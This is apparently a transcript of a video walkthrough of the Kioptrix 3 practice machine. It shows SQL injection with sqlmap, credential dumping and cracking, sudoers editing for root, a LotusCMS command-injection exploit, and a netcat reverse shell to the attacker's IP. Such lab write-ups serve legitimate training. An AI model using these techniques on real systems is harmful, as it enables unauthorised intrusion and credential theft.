Hey guys, today we're going to be attempting Kioptrix 3 in two ways. One, we find a database vulnerable to Sql injection, passing it to SQL map, gives us credentials that lead to SSH login, post which we enumerate the box to find an application that runs as root, giving us privilege to modify other files, through which we escalate privilege. The other way is that it's running load of CMS vulnerable to remote code execution, through which we gain a reverse shell, dumping the credentials from the database, points us to a PHP myadmin page, which gives us credentials to SSH again, through which we can enumerate the box and gain access. That being said, let's get started with the nmap scan. nmap-sc-sp-oa, and let's call it Kioptrix 3. Let's ask for reason, open, and ask it to be webhost 10024 is a target. We can already see port 80 open, which basically is HTTP 422 SSH. The scan is complete. It was pretty quick. We can see OpenSSH running 4.7, Apache 228, PHP 524. So since there is HTTP running, let's take a look. We can go ahead and do curl HTTP 10024. This is going to show us the page. This says something like got good security. We've revamped our site for the new release of new gallery CMS. So probably they have some kind of a CMS, and then we also see href2/gallery. The /gallery could be a subdirectory. We also can see other href tags, so it is really good for us to go ahead and grep for href, which could possibly give us all the links. One is we see index.php page equals index, probably the index page. We also see index.php system equals blog, which is pointing to blog, and then we have a login, system equals admin, and then login. So since there is a subdirectory, there could be more. We can try and root for the subdirectories. First, let's go and take a look into the site itself. We can see that there is a blog. Clicking on that leads to the blog. Clicking on login, it leads to a login page. We also do know that there is a gallery 10024/gallery, and this leads us to gallery. So we also see a lot of picture that is not loading. We can go ahead and look for other subdirectories. We'll use dir search or something like that, and we can also try something like Sql injection or default credentials to log in to this. We also see Lotus CMS running. Probably there's an exploit for Lotus CMS. So let's go ahead and do something like curl, paste that, and see what happens. We see quite few results. We can actually grep for HTTP to look for pointing pages. So if you do something like grep HTTP, curl that, and then grep HTTP, we see that page is pointing to 3 different links. One is http://gmpg.org. This seems to be like an external domain name. We are not really interested in generator. And then there is a href to kioptrix3.com. If you notice this carefully, this says kioptrix3.com/gallery, so that is the domain name. We can add that to our etc host. The second thing is, if you take a look into this page, we see a lot of images are not loading. When you hover over the image, take a look into what happens when you hover over the image. take a look into the bottom left that says kioptrix3.com/gallery. So probably if we add kioptrix3.com to the etc host, this is going to load when we refresh it. So let's go ahead and do sudo /etc host and add that IP address 10.0.2.4 kioptrix3.com. Save that and exit. Now if I'm going to ping Kioptrix3.com, you can see it's pinging 10.0.2.4. If we go ahead and reload this page, let's see what happens. And now you can see that the images are loading once we've added the etc host files. While we can come back, take a look into this, we'll go ahead and do subdirectory brute force. I am going to be using dir search opt dir search.py, and the URL is http 10.0.2.4, and then we can do -e php html -w user share word list, and then let's do derby common.txt. This is going to go ahead, do it with a sudo. This is going to go ahead and look for most common subdirectories. While that's running, let's go ahead and see if we can do anything here. One, we know this is running Lotus CMS, so the problem is we don't really know the version details of Lotus CMS. So if we specifically know a version number of Lotus CMS, we can try something. The other is if we do something like admin, that does not work. I've also can try something like a Sql injection. That does not work as well. We can take a look into the gallery and we can try to enumerate over here, because this is fetching files from some kind of a database, right? We see a picture, actually a couple pictures of a goat and a man. So what do we have? We have home, we have recent photos, and we also have the other links. We can see it's going to index.php, so that is a subdirectory there, and that is this Lightroom press that is going to g.php/1. So the point is, what happens if I'm going to change the /1 to /2 or something like that. It says no photos have been uploaded. So let's go back, and if you notice, we see a sorting option. So let's go ahead and try to sort. Let's sort by first name, and you can see that it's saying gallery.php id equals 1, sort equals file name. The point is, if the id is going to be 2, what happens? Nope. If the id equals 1, it loads. So what if id is some random stuff? This says unknown column where clauses or whatever. So we can send this to burp and see if we can do anything from this, or we can even send this to SQL map. Maybe like we'll send it to burp, send the request file to SQL map, and then it should be fine. Let's turn the intercept on, and yeah, so reload the page. It should have been in burp. We get it in burp. Let's send this to repeater and go to repeater. So we've already seen nothing happens when we send it. If I do something like this, what happens. Yeah, so this says you have an error in your SQL syntax. So probably SQL injection is possible when I add this tick mark and a double dash. So what we do is let's copy this to a file. So copy to file, and let's save this in the directory. Let's call it requst, so whatever, right? Save, and we'll send that to SQL map. We can see dir search is complete. We see /gallery/module/php_myadmin. php_myadmin could be some kind of a login. So let that be. Let's go ahead and do a SQL map. So SQL map. First, let's see if we have the request file. Yeah, we have this request file. SQL map -r the request file, and let's do /dbs to enumerate the databases. But I think we already know the database. The database is kind of gallery. Maybe we'll enumerate, we'll see what other databases are there, and then we can go ahead and take a look. /patch /level equals 5, risk to be 3, and probably S. Let's see what happens. So while that is running, we can, oh yeah, that's done. So you see 3 available databases. We see gallery, information schema, MySQL. Let's take a note of this, and we also have php_myadmin. So if there is going to be a credential in MySQL, then we can use that to log into php_myadmin. But getting there is what is difficult, right? So let's see what we have in the gallery database. So we'll do -D, I guess, to select it. -D gallery, and let's try to look for the tables in the gallery. /tables. This should give us all the tables in that particular gallery. So we see few tables like dev accounts. We see 7 tables basically. None of them are really interesting except for dev accounts, because this could contain some information related to the developer accounts, right? So let's go ahead and choose -T dev accounts, and let's do columns to look for the columns in that particular table. And we can also dump everything in that column. /dump. This is going to dump everything in the column. So we have, okay, so that was pretty quick. So it was able to not only dump the hashes that are in the table, but also crack those hashes. We see Dreg, we see lone frit. So 2 different users, one has the password Star Wars and one has the password master. So these are the hashes that were there in the table. We were able to get it. Now, since we have this credential, we can probably use this credential to log in. We saw SSH open, so maybe we can log into SSH through these credentials. Let's try SSH, and the username is going to be lonefred@10024. You can also do Kioptrix.com. That's totally going to work. And the password seems to be Star Wars. And we are logged in. So once we log in through SSH, we see that there are 2 different files. One is checksec.sh, and then we have company policy. The company policy, let's get company policy. This says, hello new employee. It is the company's policy here to use a newly installed software for editing, creating and viewing files. Please use the command sudo ht. So this particular user, lonefred, has access to this tool called ht. If I do sudo -l, this is going to tell us what we have access to. We have access to switch user, and we also have access to ht to run as root. So if either of these is running as root, and if that has some kind of a functionality which can affect other files, we can probably escalate privilege. Now, after few enumeration, googling about what HT is, it is basically a text editor, right? So if you do sudo HT, this is going to open the text editor, and we can see the text editor. So probably it's not a lot visible, but you can see this says it's a POSIX based text editor, I guess. Since the editor is running as root, we may be able to edit sensitive files. One of the sensitive files is one of the files that defines what a user has access to, which is etc sudoers. So let's do, you see that when I run sudo -l, this is listing out everything over here which we have access to, in this case to run as root. If we can add an additional functionality, like maybe we can run bash as root to the configuration file, then we may be able to use that too, right? So that's what we are trying to attempt. Let's go HT, and I think it's F3 or F2, don't know, F3. Let's do etc sudoers. Let's add just bin bash. We can save this using F2, I guess. Now if I do sudo -l, we can see that we have bin-sh added, bin bash added. So let's go ahead and try doing sudo /bin/bash. We see we have bash as root. Who am I? I am root. This is the Kioptrix 3 root through the first way, which is through Sql injection. The other way is a little different. Now there is Metasploit module available for that, but I don't really want to use the Metasploit module. Now if you take a look into this login page, we see Lotus CMS. If I go ahead and search for Certsploit Lotus CMS, we see a couple of things. One is a text document, and that is a Ruby file from Metasploit. I'm not really interested in Metasploit. The reason is I don't know the version number. Even if this is going to work, we don't really know if this is going to work against this, because this is Lotus CMS and we don't know the version number. But assuming that it works, right? Let's search for something that is apart from the Metasploit. Now in this case, if you take a look, this says remote code execution, right? So if I go ahead and search for our few of them, a lot from exploit.db, let's see if we have something else. Okay, so Lotus CMS 3.0 exploit. So we have one PHP code execution from Packet Storm. It seems to be a PHP file. No, probably a Python, I guess. Let's take a look into that. So we have this file. It would probably be easier to read it in our device. So we can copy this entire code and see if that works. Let's do nano lotus.py, paste everything there, save it, and S. So if we take a look into what we copied, we have the exploit, right? So if you take a look into the main function, we have HTTP, the target, and then the path index.php, page equals index, and then there is something that says insert a code. So it's probably inserting that malicious code here to give us a reverse shell. So what that code is, so if you see here, this says the insert code is replaced by a payload. So we just need to figure out the payload. So we will be able to write this by ourselves, right? So if we scroll up, we kind of see the payload. The payload that they are using is Perl. Perl-E. Perl is executing. The problem with this is we don't know if Perl is installed in the victim's device, right? If Perl is not installed in the victim's device, then this would probably not work. But in most cases, if it's running Apache, then it should support Perl. It's kind of a de facto standard in most cases. But if not, this is not going to work. So if we can chain the payload to ourselves. If you kind of carefully look, this is not the entire payload, right? There is this thing called payload. This is what is going to go inside this as the payload. And the payload says there is a system call. System call is encoding, basically is decoding twice this injection. So this is nothing but probably this. It gets our host and port and then putting it here. Maybe like it's converting this into base64 a couple of times, putting it there, and the payload is running a system call to decode that twice and then run it. So probably that's how it works. I'm not sure. So let's go ahead and try that. Python lotus.py. What does it say? This says the usage is lotus.py, target host, path to the Lotus CMS, the listening host, and the listening port. So let's do Python lotus.py. The target host is Kioptrix3.com in our case, and the path basically is, what is the path? And now the path is index.php. Yeah, so the path is index.php. So we'll do slash index.php, and the listening host, which is our IP address 10.02.15 in my case. The port that I wanted to listen to is 4545. While that is going on, we kind of need to set up the listener. At least that's what it would say. So let's go ahead and set up nc-lvnp4545 to remove that. What happened? Forward host lookup failed. Okay, it's a -lvnp, and press enter here. This says if you have a listener set up, go ahead. And what happens? That did not work. We did not get a reversal. So probably we are doing something wrong, or this is not working. So we can fix this by ourselves. Only if we can understand what this Python script is doing, we can maybe like reconstruct that from that, right? One of the things that I'm going to do is going to do a proxy chain, going to send this entire request to burp and intercept through burp, and then we can make modifications there. So let's go ahead, turn the intercept off, and what we'll do is we'll take a look into the proxy chains. proxychains.conf. We'll make sure we redirect all the requests to the proxy chains, and also make sure this DNS is disabled, right? Don't do a proxy DNS. If you do a proxy DNS, probably it's not going to work. So if it's enabled, disable it. End of the file had a proxy. The proxy is the burp suite's address, basically HTTP 127.0.0.1, the local host, port number 8080, because we know burp is running there. save that, and proxy chains python lotus.py, and maybe we will add just the proxy chains there. Proxy chains, hit enter. You can see that it is sending to burp. So let's go to burp. So burp is able to get that request. Let's send this to repeater and take a look here. So if you take a look here, this is encoded, right? Let's try decoding it first. So probably URL encoded. You can do Control Shift U to decode it. I'll do a right click and do it so that you understand what I'm doing. So we've decoded that, and then you see the system call. That is the system call that is doing something like base64 decode once, base64 decode twice, and then there is this whole base64 data. So if we try to decode this base64 data, let's see what happens. Control Shift B again to decode, and do a right click so you understand what I'm trying to do, and we will decode that again. Base64 decode, and you see the Perl script, right? So this is what it is doing. Whatever we saw there, less Lotus file, whatever we saw there, this entire Perl thing. So it's basically putting that Perl script into this injection point, calling it the payload, right? And it's also doing the $I is the IP address, the $P is the port number. So you can see after the $I, that is the IP address, after the $P, that is the port number. Quite interesting. The point is, what if I don't need this, right? What if I don't need this entire base64 data? What if I don't need this decoding functions? What if I can only run a system call without whatever they are trying to do, without their whole Perl thing, encoding, decoding stuff? So if I do something like who am I, is this going to be executed, right? So that is my question. So let's try to encode this. Right click, convert selection URL encode, and send the request. What do we find? Nothing. Doesn't work. Now probably it doesn't work because if you see here, it says /index.php and again index.php for some reason. Let's delete that, send again. What happens? We see dub data, which is the result for who am I, which means we probably will be able to run other commands, right? So let's do something like which Python. We need to make sure this is encoded. Convert selections URL encode, send that. What do we see? User bin Python. So since we are able to run other commands, we can see if there are programs that is going to make it easier for us. Probably if netcat is installed, we can maybe like use netcat to spawn a shell. We can also use the bash script, the bash script to send a reverse shell. We can look into the reverse shell cheat sheet and try doing it. But if netcat is there, which NC, this is going to make the work a lot easier, right? Let's encode that, send it, and we can see bin NC, which means we can run NC netcat 10.02.15, my IP address, port number 4545 that I want to listen on, which I'm already listening, -e/bin/bash, and let's encode this. Control U to encode that and send it. What happens? You can see we don't receive a response. We don't receive a response because we are actually getting a connection. You see there, we get a connection. So let's go ahead and try something like who am I. we are data. So since we know that Python is installed, which we've seen earlier, let's do import pty spawn /bin/bash, and we get a bash shell. So that's there. Now since we have this, we can go ahead and enumerate the box, right? So we can take a look into all the files that are there here. So if I do ls, we see we have gallery, which is the database. We already do know. So since this is the database, we can go ahead into the database and see if there are any files, important files, or we can first search in this directory completely and then decide. For now, I'll go into gallery list. There are so many files. Now it's really hard to search into every single file, and mostly what is going to contain credentials would be a PHP configuration file or something like that. So what we can do is, without coming up with like kind of a blind assumption, we can do something like find everything in this current directory that has the name php .php, and we can do dash type f, and then we can execute a command. Let's execute grep let's look for password, and I think that should be it. Password and redirect. We don't even need to do that. Let's just do exec grep password. We don't even need type or anything like that. We'll just find everything. We don't even need to find everything, I guess. Simply, read everything. Let's do grep password and 2 greater than dev null to redirect all the errors. What? Oh, we have to execute grep, right? So okay, find let's find everything in PHP. Let's do exec grep password 2 greater than dev null. What happened? We can simply do grep dot slash and everything, and yeah, just do grep password on everything in the current directory, redirect to dev null. That should work. We find a lot. Let's go ahead and exit this and let's see what we have. So note that the password carefully. It is a random password that was generated just for you. If you lose it, you will have to delete tables from the database yourself and blah blah blah. Let's go ahead and find if there is something interesting. And you see that that is the galerific MySQL password, right? It says fuck you, and that word is in this particular file called gconfig. So let's take a look into gconfig.php. So where is it? So it's here, gconfig.php. Let's do less gconfig.php, and we see the username and password for the database, which is root and fuck you. it's for gallery. And remember, we saw PHP myadmin. So if I take a look into what we have here, we saw that there is PHP myadmin. We can go ahead, take a look into PHP myadmin and probably try logging in, right? So let's go ahead. Let's turn the burp suite off. Let's do /php myadmin. Let's do root and the password, and we log in. So what from here? Now from here we can start looking around. We can see if there is something odd. We see gallery information schema and MySQL. Let's take a look into gallery. And this is what we dumped out, right, from SQL map. We saw like 3 databases. One of the database was gallery, which had this thing called dev accounts. And the dev accounts part had the username and password. This username and password thing is what we dumped out. So what do? We can query for that username and password. Yeah, so we can see the username lone Fred along with the hash, the username Greg along with the hash. Cracking this password leads to SSH. From SSH, you know what to do. So that is the Kioptrix 3. 2 ways, right? Hope you've enjoyed this video. Thank you for watching. See you guys next time.